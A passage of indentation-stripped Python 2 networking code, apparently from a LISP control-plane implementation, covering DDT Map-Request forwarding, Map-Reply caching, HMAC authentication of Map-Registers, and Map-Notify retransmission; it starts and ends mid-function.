if (lisp_get_eid_hash(eid) != None):
action = LISP_SEND_MAP_REQUEST_ACTION
#endif
packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl, None,
None, False, False)
#
# Send Map-Notify if this Map-Request is a subscribe-request.
#
if (pubsub):
lisp_process_pubsub(sockets, packet, eid, dest, port, nonce, ttl,
xtr_id)
else:
lisp_send_map_reply(sockets, packet, dest, port)
#endif
return
#enddef
#
# lisp_retransmit_ddt_map_request
#
# Have the Map-Resolver transmit a DDT Map-Request.
#
def lisp_retransmit_ddt_map_request(mr):
seid_str = mr.mr_source.print_address()
deid_str = mr.print_eid_tuple()
nonce = mr.nonce
#
# Get referral-node for who we sent Map-Request to last time. We need
# to increment, the no-response timer.
#
if (mr.last_request_sent_to):
last_node = mr.last_request_sent_to.print_address()
ref = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
mr.last_cached_prefix[1], True)
if (ref and ref.referral_set.has_key(last_node)):
ref.referral_set[last_node].no_responses += 1
#endif
#endif
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}". \
format(green(deid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
mr.retry_count += 1
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format(bold("Map-Request", False), "P" if mr.from_pitr else "",
red(mr.itr.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Do referral lookup and send the DDT Map-Request again.
#
lisp_send_ddt_map_request(mr, False)
#
# Restart retransmit timer.
#
mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [mr])
mr.retransmit_timer.start()
return
#enddef
#
# lisp_get_referral_node
#
# Get a referral-node of highest priority that is in the up state. Returns
# class lisp_referral_node().
#
def lisp_get_referral_node(referral, source_eid, dest_eid):
#
# Build list of high-priority up referral-nodes.
#
ref_set = []
for ref_node in referral.referral_set.values():
if (ref_node.updown == False): continue
if (len(ref_set) == 0 or ref_set[0].priority == ref_node.priority):
ref_set.append(ref_node)
elif (ref_set[0].priority > ref_node.priority):
ref_set = []
ref_set.append(ref_node)
#endif
#endfor
ref_count = len(ref_set)
if (ref_count == 0): return(None)
hashval = dest_eid.hash_address(source_eid)
hashval = hashval % ref_count
return(ref_set[hashval])
#enddef
#
# lisp_send_ddt_map_request
#
# Send a DDT Map-Request based on a EID lookup in the referral cache.
#
def lisp_send_ddt_map_request(mr, send_to_root):
lisp_sockets = mr.lisp_sockets
nonce = mr.nonce
itr = mr.itr
mr_source = mr.mr_source
eid_str = mr.print_eid_tuple()
#
# Check if the maximum allowable Map-Requests have been sent for this
# map-request-queue entry.
#
if (mr.send_count == 8):
lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format( \
green(eid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
#
# If caller wants us to use the root versus best match lookup. We only
# so this once per Map-Request queue entry.
#
if (send_to_root):
lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
mr.tried_root = True
lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
else:
lookup_eid = mr.eid
lookup_group = mr.group
#endif
#
# Do longest match on EID into DDT referral cache.
#
referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
if (referral == None):
lprint("No referral cache entry found")
lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
nonce, itr, mr.sport, 15, None, False)
return
#endif
ref_str = referral.print_eid_tuple()
lprint("Found referral cache entry {}, referral-type: {}".format(ref_str,
referral.print_referral_type()))
ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
if (ref_node == None):
lprint("No reachable referral-nodes found")
mr.dequeue_map_request()
lisp_send_negative_map_reply(lisp_sockets, referral.eid,
referral.group, nonce, itr, mr.sport, 1, None, False)
return
#endif
lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}". \
format(ref_node.referral_address.print_address(),
referral.print_referral_type(), green(eid_str, False),
lisp_hex_string(nonce)))
#
# Encapsulate Map-Request and send out.
#
to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
referral.referral_type == LISP_DDT_ACTION_MS_ACK)
lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
ref_node.referral_address, to_ms=to_ms, ddt=True)
#
# Do some stats.
#
mr.last_request_sent_to = ref_node.referral_address
mr.last_sent = lisp_get_timestamp()
mr.send_count += 1
ref_node.map_requests_sent += 1
return
#enddef
#
# lisp_mr_process_map_request
#
# Process a Map-Request received by an ITR. We need to forward this Map-Request
# to the longest matched referral from the referral-cache.
#
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
sport, mr_source):
eid = map_request.target_eid
group = map_request.target_group
deid_str = map_request.print_eid_tuple()
seid_str = mr_source.print_address()
nonce = map_request.nonce
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format("P" if map_request.pitr_bit else "",
red(ecm_source.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Queue the Map-Request. We need to reliably transmit it.
#
mr = lisp_ddt_map_request(lisp_sockets, packet, eid, group, nonce)
mr.packet = packet
mr.itr = ecm_source
mr.mr_source = mr_source
mr.sport = sport
mr.from_pitr = map_request.pitr_bit
mr.queue_map_request()
lisp_send_ddt_map_request(mr, False)
return
#enddef
#
# lisp_process_map_request
#
# Process received Map-Request as a Map-Server or an ETR.
#
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
mr_source, mr_port, ddt_request, ttl, timestamp):
orig_packet = packet
map_request = lisp_map_request()
packet = map_request.decode(packet, mr_source, mr_port)
if (packet == None):
lprint("Could not decode Map-Request packet")
return
#endif
map_request.print_map_request()
#
# If RLOC-probe request, process separately.
#
if (map_request.rloc_probe):
lisp_process_rloc_probe_request(lisp_sockets, map_request, mr_source,
mr_port, ttl, timestamp)
return
#endif
#
# Process SMR.
#
if (map_request.smr_bit):
lisp_process_smr(map_request)
#endif
#
# Process SMR-invoked Map-Request.
#
if (map_request.smr_invoked_bit):
lisp_process_smr_invoked_request(map_request)
#endif
#
# Do ETR processing of the Map-Request if we found a database-mapping.
#
if (lisp_i_am_etr):
lisp_etr_process_map_request(lisp_sockets, map_request, mr_source,
mr_port, ttl, timestamp)
#endif
#
# Do Map-Server processing of the Map-Request.
#
if (lisp_i_am_ms):
packet = orig_packet
eid, group, ddt_action = lisp_ms_process_map_request(lisp_sockets,
orig_packet, map_request, mr_source, mr_port, ecm_source)
if (ddt_request):
lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source,
ecm_port, ddt_action, eid, group)
#endif
return
#endif
#
# Map-Request is from an ITR destined to a Map-Resolver.
#
if (lisp_i_am_mr and not ddt_request):
lisp_mr_process_map_request(lisp_sockets, orig_packet, map_request,
ecm_source, mr_port, mr_source)
#endif
#
# Do DDT-node processing of the Map-Request.
#
if (lisp_i_am_ddt or ddt_request):
packet = orig_packet
lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source,
ecm_port)
#endif
return
#enddef
#
# lisp_store_mr_stats
#
# Store counter and timing stats for the map-resolver that just sent us a
# negative Map-Reply.
#
def lisp_store_mr_stats(source, nonce):
mr = lisp_get_map_resolver(source, None)
if (mr == None): return
#
# Count and record timestamp.
#
mr.neg_map_replies_received += 1
mr.last_reply = lisp_get_timestamp()
#
# For every 100 replies, reset the total_rtt so we can get a new average.
#
if ((mr.neg_map_replies_received % 100) == 0): mr.total_rtt = 0
#
# If Map-Reply matches stored nonce, then we can do an RTT calculation.
#
if (mr.last_nonce == nonce):
mr.total_rtt += (time.time() - mr.last_used)
mr.last_nonce = 0
#endif
if ((mr.neg_map_replies_received % 10) == 0): mr.last_nonce = 0
return
#enddef
#
# lisp_process_map_reply
#
# Process received Map-Reply.
#
def lisp_process_map_reply(lisp_sockets, packet, source, ttl, itr_in_ts):
global lisp_map_cache
map_reply = lisp_map_reply()
packet = map_reply.decode(packet)
if (packet == None):
lprint("Could not decode Map-Reply packet")
return
#endif
map_reply.print_map_reply()
#
# Process each EID record in Map-Reply message.
#
rloc_key_change = None
for i in range(map_reply.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Reply packet")
return
#endif
eid_record.print_record(" ", False)
#
# If negative Map-Reply, see if from a Map-Resolver, do some counting
# and timing stats.
#
if (eid_record.rloc_count == 0):
lisp_store_mr_stats(source, map_reply.nonce)
#endif
multicast = (eid_record.group.is_null() == False)
#
# If this is a (0.0.0.0/0, G) with drop-action, we don't want to
# cache more-specific (S,G) entry. It is a startup timing problem.
#
if (lisp_decent_push_configured):
action = eid_record.action
if (multicast and action == LISP_DROP_ACTION):
if (eid_record.eid.is_local()): continue
#endif
#endif
#
# Some RLOC-probe Map-Replies may have no EID value in the EID-record.
# Like from RTRs or PETRs.
#
if (multicast == False and eid_record.eid.is_null()): continue
#
# Do not lose state for other RLOCs that may be stored in an already
# cached map-cache entry.
#
if (multicast):
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
else:
mc = lisp_map_cache.lookup_cache(eid_record.eid, True)
#endif
new_mc = (mc == None)
#
# Do not let map-cache entries from Map-Replies override gleaned
# entries.
#
if (mc == None):
glean, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (glean): continue
else:
if (mc.gleaned): continue
#endif
#
# Process each RLOC record in EID record.
#
rloc_set = []
mrloc = None
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
rloc_record.keys = map_reply.keys
packet = rloc_record.decode(packet, map_reply.nonce)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Reply packet")
return
#endif
rloc_record.print_record(" ")
old_rloc = None
if (mc): old_rloc = mc.get_rloc(rloc_record.rloc)
if (old_rloc):
rloc = old_rloc
else:
rloc = lisp_rloc()
#endif
#
# Copy RLOC data from record, add to locator-set. Check to see
# if the RLOC has been translated by a NAT. If so, go get the
# translated port and store in rloc entry.
#
port = rloc.store_rloc_from_record(rloc_record, map_reply.nonce,
source)
rloc.echo_nonce_capable = map_reply.echo_nonce_capable
if (rloc.echo_nonce_capable):
addr_str = rloc.rloc.print_address_no_iid()
if (lisp_get_echo_nonce(None, addr_str) == None):
lisp_echo_nonce(addr_str)
#endif
#endif
#
# Add itr-in timestamp if telemetry data included in RLOC record..
#
if (rloc.json):
if (lisp_is_json_telemetry(rloc.json.json_string)):
js = rloc.json.json_string
js = lisp_encode_telemetry(js, ii=itr_in_ts)
rloc.json.json_string = js
#endif
#endif
#
# Process state for RLOC-probe reply from this specific RLOC. And
# update RLOC state for map-cache entry. Ignore an RLOC with a
# different address-family of the recieved packet. The ITR really
# doesn't know it can reach the RLOC unless it probes for that
# address-family.
#
if (map_reply.rloc_probe and rloc_record.probe_bit):
if (rloc.rloc.afi == source.afi):
lisp_process_rloc_probe_reply(rloc, source, port,
map_reply, ttl, mrloc)
#endif
if (rloc.rloc.is_multicast_address()): mrloc = rloc
#endif
#
# Append to rloc-set array to be stored in map-cache entry.
#
rloc_set.append(rloc)
#
# Did keys change for thie RLOC, flag it if so.
#
if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
rloc_key_change = rloc
#endif
#endfor
#
# If the map-cache entry is for an xTR behind a NAT, we'll find an
# RTR RLOC (which is priority 254). Store private RLOCs that may
# come along with the RTR RLOC because the destination RLOC could
# be behind the same NAT as this ITR. This ITR, however could be
# behind another NAT or in public space. We want to mark the
# private address RLOC unreachable for the two later cases.
#
if (map_reply.rloc_probe == False and lisp_nat_traversal):
new_set = []
log_set = []
for rloc in rloc_set:
#
# Set initial state for private RLOCs to UNREACH and test
# with RLOC-probes if up behind same NAT.
#
if (rloc.rloc.is_private_address()):
rloc.priority = 1
rloc.state = LISP_RLOC_UNREACH_STATE
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
continue
#endif
#
# RTR should not put RTR RLOC in map-cache. But xTRs do. None
# RTR RLOCs should only go in the RTR map-cache.
#
if (rloc.priority == 254 and lisp_i_am_rtr == False):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
if (rloc.priority != 254 and lisp_i_am_rtr):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
#endfor
if (log_set != []):
rloc_set = new_set
lprint("NAT-traversal optimized RLOC-set: {}".format(log_set))
#endif
#endif
#
# If any RLOC-records do not have RLOCs, don't put them in the map-
# cache.
#
new_set = []
for rloc in rloc_set:
if (rloc.json != None): continue
new_set.append(rloc)
#endfor
if (new_set != []):
count = len(rloc_set) - len(new_set)
lprint("Pruning {} no-address RLOC-records for map-cache".format( \
count))
rloc_set = new_set
#endif
#
# If this is an RLOC-probe reply and the RLOCs are registered with
# merge semantics, this Map-Reply may not include the other RLOCs.
# In this case, do not wipe out the other RLOCs. Get them from the
# existing entry.
#
if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set
#
# If we are overwriting the rloc-set cached in the map-cache entry,
# then remove the old rloc pointers from the RLOC-probe list.
#
rloc_set_change = new_mc
if (mc and rloc_set != mc.rloc_set):
mc.delete_rlocs_from_rloc_probe_list()
rloc_set_change = True
#endif
#
# Add to map-cache. If this is a replace, save uptime.
#
uptime = mc.uptime if (mc) else None
if (mc == None):
mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
mc.mapping_source = source
#
# If this is a multicast map-cache entry in an RTR, set map-cache
# TTL small so Map-Requests can be sent more often to capture
# RLE changes.
#
if (lisp_i_am_rtr and eid_record.group.is_null() == False):
mc.map_cache_ttl = LISP_MCAST_TTL
else:
mc.map_cache_ttl = eid_record.store_ttl()
#endif
mc.action = eid_record.action
mc.add_cache(rloc_set_change)
#endif
add_or_replace = "Add"
if (uptime):
mc.uptime = uptime
mc.refresh_time = lisp_get_timestamp()
add_or_replace = "Replace"
#endif
lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
green(mc.print_eid_tuple(), False), len(rloc_set)))
#
# If there were any changes to the RLOC-set or the keys for any
# existing RLOC in the RLOC-set, tell the external data-plane.
#
if (lisp_ipc_dp_socket and rloc_key_change != None):
lisp_write_ipc_keys(rloc_key_change)
#endif
#
# Send RLOC-probe to highest priority RLOCs if this is a new map-cache
# entry. But if any of the RLOCs were used before in other map-cache
# entries, no need to send RLOC-probes.
#
if (new_mc):
probe = bold("RLOC-probe", False)
for rloc in mc.best_rloc_set:
addr_str = red(rloc.rloc.print_address_no_iid(), False)
lprint("Trigger {} to {}".format(probe, addr_str))
lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group, rloc)
#endfor
#endif
#endfor
return
#enddef
#
# lisp_compute_auth
#
# Create HMAC hash from packet contents store in lisp_map_register() and
# encode in packet buffer.
#
def lisp_compute_auth(packet, map_register, password):
if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)
packet = map_register.zero_auth(packet)
hashval = lisp_hash_me(packet, map_register.alg_id, password, False)
#
# Store packed hash value in lisp_map_register().
#
map_register.auth_data = hashval
packet = map_register.encode_auth(packet)
return(packet)
#enddef
#
# lisp_hash_me
#
# Call HMAC hashing code from multiple places. Returns hash value.
#
def lisp_hash_me(packet, alg_id, password, do_hex):
if (alg_id == LISP_NONE_ALG_ID): return(True)
if (alg_id == LISP_SHA_1_96_ALG_ID):
hashalg = hashlib.sha1
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
hashalg = hashlib.sha256
#endif
if (do_hex):
hashval = hmac.new(password, packet, hashalg).hexdigest()
else:
hashval = hmac.new(password, packet, hashalg).digest()
#endif
return(hashval)
#enddef
#
# lisp_verify_auth
#
# Compute sha1 or sha2 hash over Map-Register packet and compare with one
# transmitted in packet that is stored in class lisp_map_register.
#
def lisp_verify_auth(packet, alg_id, auth_data, password):
if (alg_id == LISP_NONE_ALG_ID): return(True)
hashval = lisp_hash_me(packet, alg_id, password, True)
matched = (hashval == auth_data)
#
# Print differences if hashes if they do not match.
#
if (matched == False):
lprint("Hashed value: {} does not match packet value: {}".format( \
hashval, auth_data))
#endif
return(matched)
#enddef
#
# lisp_retransmit_map_notify
#
# Retransmit the already build Map-Notify message.
#
def lisp_retransmit_map_notify(map_notify):
dest = map_notify.etr
port = map_notify.etr_port
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}". \
format(map_notify.nonce_key, red(dest.print_address(), False)))
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
try:
lisp_map_notify_queue.pop(key)
except:
lprint("Key not found in Map-Notify queue")
#endtry
#endif
return
#endif
lisp_sockets = map_notify.lisp_sockets
map_notify.retry_count += 1
lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format( \
bold("Map-Notify", False), map_notify.nonce_key,
red(dest.print_address(), False), map_notify.retry_count))
lisp_send_map_notify(lisp_sockets, map_notify.packet, dest, port)
if (map_notify.site): map_notify.site.map_notifies_sent += 1
#
# Restart retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_merged_map_notify
#
# Send Map-Notify with a merged RLOC-set to each ETR in the RLOC-set.
#
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record):
#
# Build EID-record once.
#
eid_record.rloc_count = len(parent.registered_rlocs)
packet_record = eid_record.encode()
eid_record.print_record("Merged Map-Notify ", False)
#
# Buld RLOC-records for merged RLOC-set.
#
for xtr in parent.registered_rlocs:
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(xtr)
packet_record += rloc_record.encode()
rloc_record.print_record(" ")
del(rloc_record)
#endfor
#
# Build Map-Notify for each xTR that needs to receive the Map-Notify.
#
for xtr in parent.registered_rlocs:
dest = xtr.rloc
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
key_id = map_register.key_id
map_notify.key_id = key_id
map_notify.alg_id = map_register.alg_id
map_notify.auth_len = map_register.auth_len
map_notify.nonce = map_register.nonce
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(dest)
map_notify.etr_port = map_register.sport
map_notify.site = parent.site
packet = map_notify.encode(packet_record, parent.site.auth_key[key_id])
map_notify.print_notify()
#
# Put Map-Notify state on retransmission queue.
#
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
remove = lisp_map_notify_queue[key]
remove.retransmit_timer.cancel()
del(remove)
#endif
lisp_map_notify_queue[key] = map_notify
#
# Send out.
#
lprint("Send merged Map-Notify to ETR {}".format( \
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
parent.site.map_notifies_sent += 1
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
#endfor
return
#enddef
#
# lisp_build_map_notify
#
# Setup retransmission queue entry to send the first Map-Notify.
#
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):
key = lisp_hex_string(nonce) + source.print_address()
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
s = red(source.print_address_no_iid(), False)
lprint("Map-Notify with nonce 0x{} pending for xTR {}".format( \
lisp_hex_string(map_notify.nonce), s))
return
#endif
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = record_count
key_id = key_id
map_notify.key_id = key_id
map_notify.alg_id = alg_id
map_notify.auth_len = auth_len
map_notify.nonce = nonce
map_notify.nonce_key = lisp_hex_string(nonce)
map_notify.etr.copy_address(source)
map_notify.etr_port = port
map_notify.site = site
map_notify.eid_list = eid_list
#
# Put Map-Notify state on retransmission queue.
#
if (map_register_ack == False):
key = map_notify.nonce_key
lisp_map_notify_queue[key] = map_notify
#endif
if (map_register_ack):
lprint("Send Map-Notify to ack Map-Register")
else:
lprint("Send Map-Notify for RLOC-set change")
#endif
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, site.auth_key[key_id])
map_notify.print_notify()
if (map_register_ack == False):
eid_record = lisp_eid_record()
eid_record.decode(eid_records)
eid_record.print_record(" ", False)
#endif
#
# Send out.
#
lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
site.map_notifies_sent += 1
if (map_register_ack): return
#
# Set retransmit timer if this is an unsolcited Map-Notify. Otherwise,
# we are acknowledging a Map-Register and the registerer is not going
# to send a Map-Notify-Ack so we shouldn't expect one.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_map_notify_ack
#
# Change Map-Notify message to have a new type (Map-Notify-Ack) and
# reauthenticate message.
#
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
map_notify.map_notify_ack = True
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, ms.password)
map_notify.print_notify()
#
# Send the Map-Notify-Ack.
#
dest = ms.map_server
lprint("Send Map-Notify-Ack to {}".format(
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_multicast_map_notify
#
# Send a Map-Notify message to an xTR for the supplied (S,G) passed into this
# function.
#
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
map_notify.nonce = lisp_get_control_nonce()
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(xtr)
map_notify.etr_port = LISP_CTRL_PORT
map_notify.eid_list = eid_list
key = map_notify.nonce_key
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
lprint("Map-Notify with nonce 0x{} pending for ITR {}".format( \
map_notify.nonce, red(xtr.print_address_no_iid(), False)))
return
#endif
#
# Put Map-Notify state on retransmission queue.
#
lisp_map_notify_queue[key] = map_notify
#
# Determine if there are any RTRs in the RLOC-set for this (S,G).
#
rtrs_exist = site_eid.rtrs_in_rloc_set()
if (rtrs_exist):
if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs_exist = False
#endif
#
# Build EID-record.
#
eid_record = lisp_eid_record()
eid_record.record_ttl = 1440
eid_record.eid.copy_address(site_eid.eid)
eid_record.group.copy_address(site_eid.group)
eid_record.rloc_count = 0
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
eid_record.rloc_count += 1
#endfor
packet = eid_record.encode()
#
# Print contents of Map-Notify.
#
map_notify.print_notify()
eid_record.print_record(" ", False)
#
# Build locator-set with only RTR RLOCs if they exist.
#
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#
# Encode it.
#
packet = map_notify.encode(packet, "")
if (packet == None): return
#
# Send Map-Notify to xtR.
#
lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_queue_multicast_map_notify
#
# This funciton will look for the ITRs in the local site cache.
#
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
for sg in rle_list:
sg_site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
if (sg_site_eid == None): continue
#
# (S,G) RLOC-set could be empty when last RLE goes away. We will have
# to search all individual registrations searching for RTRs.
#
# We store in a dictonary array so we can remove duplicates.
#
sg_rloc_set = sg_site_eid.registered_rlocs
if (len(sg_rloc_set) == 0):
temp_set = {}
for se in sg_site_eid.individual_registrations.values():
for rloc_entry in se.registered_rlocs:
if (rloc_entry.is_rtr() == False): continue
temp_set[rloc_entry.rloc.print_address()] = rloc_entry
#endfor
#endfor
sg_rloc_set = temp_set.values()
#endif
#
# If this is a (0.0.0.0/0, G) or a (0::/0, G), we send a Map-Notify
# to all members (all RLOCs in the sg_rloc_set.
#
notify = []
found_rtrs = False
if (sg_site_eid.eid.address == 0 and sg_site_eid.eid.mask_len == 0):
notify_str = []
rle_nodes = []
if (len(sg_rloc_set) != 0 and sg_rloc_set[0].rle != None):
rle_nodes = sg_rloc_set[0].rle.rle_nodes
#endif
for rle_node in rle_nodes:
notify.append(rle_node.address)
notify_str.append(rle_node.address.print_address_no_iid())
#endfor
lprint("Notify existing RLE-nodes {}".format(notify_str))
else:
#
# If the (S,G) has an RTR registered, then we will send a
# Map-Notify to the RTR instead the ITRs of the source-site.
#
for rloc_entry in sg_rloc_set:
if (rloc_entry.is_rtr()): notify.append(rloc_entry.rloc)
#endfor
#
# If no RTRs were found, get ITRs from source-site.
#
found_rtrs = (len(notify) != 0)
if (found_rtrs == False):
site_eid = lisp_site_eid_lookup(sg[0], null_group, False)
if (site_eid == None): continue
for rloc_entry in site_eid.registered_rlocs:
if (rloc_entry.rloc.is_null()): continue
notify.append(rloc_entry.rloc)
#endfor
#endif
#
# No ITRs or RTRs fond.
#
if (len(notify) == 0):
lprint("No ITRs or RTRs found for {}, Map-Notify suppressed". \
format(green(sg_site_eid.print_eid_tuple(), False)))
continue
#endif
#endif
#
# Send multicast Map-Notify to either ITR-list or RTR-list.
#
for xtr in notify:
lprint("Build Map-Notify to {}TR {} for {}".format("R" if \
found_rtrs else "x", red(xtr.print_address_no_iid(), False),
green(sg_site_eid.print_eid_tuple(), False)))
el = [sg_site_eid.print_eid_tuple()]
lisp_send_multicast_map_notify(lisp_sockets, sg_site_eid, el, xtr)
time.sleep(.001)
#endfor
#endfor
return
#enddef
#
# lisp_find_sig_in_rloc_set
#
# Look for a "signature" key in a JSON RLOC-record. Return None, if not found.
# Return RLOC record if found.
#
def lisp_find_sig_in_rloc_set(packet, rloc_count):
for i in range(rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
json_sig = rloc_record.json
if (json_sig == None): continue
try:
json_sig = json.loads(json_sig.json_string)
except:
lprint("Found corrupted JSON signature")
continue
#endtry
if (json_sig.has_key("signature") == False): continue
return(rloc_record)
#endfor
return(None)
#enddef
#
# lisp_get_eid_hash
#
# From an EID, return EID hash value. Here is an example where all but the
# high-order byte is the EID hash for each hash-length:
#
# EID: fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430
# EID-hash: 4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430 eid_hash_len = 120
# EID-hash: 6dbd:3799:48e1:c6a2:9430 eid_hash_len = 80
#
# Note when an eid-prefix in lisp_eid_hashes[] has an instance-id of -1, it
# means the eid-prefix is used for all EIDs from any instance-id.
#
# Returns a string with hex digits between colons and the hash length in bits.
# Returns None if the IPv6 EID is not a crypto-hash address. These addresses
# are not authenticated.
#
def lisp_get_eid_hash(eid):
hash_mask_len = None
for eid_prefix in lisp_eid_hashes:
#
# For wildcarding the instance-ID.
#
iid = eid_prefix.instance_id
if (iid == -1): eid_prefix.instance_id = eid.instance_id
ms = eid.is_more_specific(eid_prefix)
eid_prefix.instance_id = iid
if (ms):
hash_mask_len = 128 - eid_prefix.mask_len
break
#endif
#endfor
if (hash_mask_len == None): return(None)
address = eid.address
eid_hash = ""
for i in range(0, hash_mask_len / 16):
addr = address & 0xffff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(4) + ":" + eid_hash
address >>= 16
#endfor
if (hash_mask_len % 16 != 0):
addr = address & 0xff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(2) + ":" + eid_hash
#endif
return(eid_hash[0:-1])
#enddef
#
# lisp_lookup_public_key
#
# Given an EID, do a mapping system lookup for a distinguished-name EID
# 'hash-<cga-hash>' to obtain the public-key from an RLOC-record.
#
# Return [hash_id, pubkey, True/False]. Values can be of value None but last
# boolean argument is if the hash lookup was found.
#
def lisp_lookup_public_key(eid):
iid = eid.instance_id
#
# Parse out CGA hash to do public-key lookup with instance-ID and hash
# as a distinguished-name EID.
#
pubkey_hash = lisp_get_eid_hash(eid)
if (pubkey_hash == None): return([None, None, False])
pubkey_hash = "hash-" + pubkey_hash
hash_eid = lisp_address(LISP_AFI_NAME, pubkey_hash, len(pubkey_hash), iid)
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
#
# Do lookup in local instance-ID.
#
site_eid = lisp_site_eid_lookup(hash_eid, group, True)
if (site_eid == None): return([hash_eid, None, False])
#
# Look for JSON RLOC with key "public-key".
#
